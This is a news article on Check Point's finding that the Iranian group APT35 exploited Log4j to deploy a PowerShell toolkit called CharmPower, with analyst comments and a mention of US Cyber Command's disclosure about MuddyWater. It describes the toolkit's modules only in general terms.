An Iranian state-sponsored hacking group has been discovered to be actively exploiting Apache Log4j vulnerabilities to distribute a new PowerShell modular toolkit for nefarious purposes.
Detailed On Tuesday, by researchers at Check Point Software Technologies Ltd., the APT35 hacking group, also known as the Phosphorous and Charming Kitten, was first detected exploiting Log4j just four days after the disclosure of the first vulnerability. The attack setup is described as rushed, as the group only used a basic open-source JNDI exploit kit.
Having gained access to a vulnerable service, the Iranian hackers then included a new PowerShell-based modular framework that was dubbed “CharmPower”. The script is used to establish persistence, collect information, and run commands.
CharmPower has four main initial modules. The first validates a network connection, and the second gathers basic system information such as Windows version, computer name, and the contents of various system files. The third module decodes the command and control domain retrieved from a hard-coded URL stored on an Amazon Web Services Inc. S3 bucket, while the final module receives, decrypts, and executes the tracking modules.
Based on the information gathered by the initial deployment, APT35 then deploys additional custom modules to facilitate data theft and hide its presence on the infected machine.
APT35 is a well-known hacking group that was mostly linked to attacks in 2020 targeting the Trump campaign, current and former US government officials, journalists covering global politics, and prominent Iranians living outside of Iran. The group also targeted the Munich Security Conference later that same year.
“Research linking the exploitation of Log4Shell to the Iranian APT Charming Kitten coincides, and somewhat conflicts, with a statement made by the US Cybersecurity Infrastructure and Security Agency on January 10 which suggested that there had been no significant bug-related intrusion at that time.” Chris Morgan, principal cyber threat intelligence analyst at digital risk solutions provider Digital Shadows Ltd., told SiliconANGLE. “This likely highlights the ongoing issues of incident disclosure and transparency, and the lag that can exist between threat actor activity and threat discovery.
John Bambenek, lead threat hunter at an IT services management company Netenrich Inc., said it’s no surprise that second-tier nation-state actors are leveraging the opportunity presented by the log4j vulnerability in a rushed way.
“Any feat of this gravity would be grabbed by anyone looking to gain a foothold quickly and sometimes tactical windows open up like this which means you have to act fast,” Bambenek said. “The bigger question is, which intelligence agency was using this before the vulnerability was made public?”
News that Iranian hackers were exploiting Log4j vulnerabilities came as US Cyber Command’s Cyber National Mission Force disclosed that he had identified several open-source tools that Iranian intelligence actors use in networks around the world.
The disclosure concerned an Iranian state-sponsored hacking group dubbed “MuddyWater”. The group has been linked to Iran’s Ministry of Intelligence and Security and mainly targets other countries in the Middle East and occasionally countries in Europe and North America.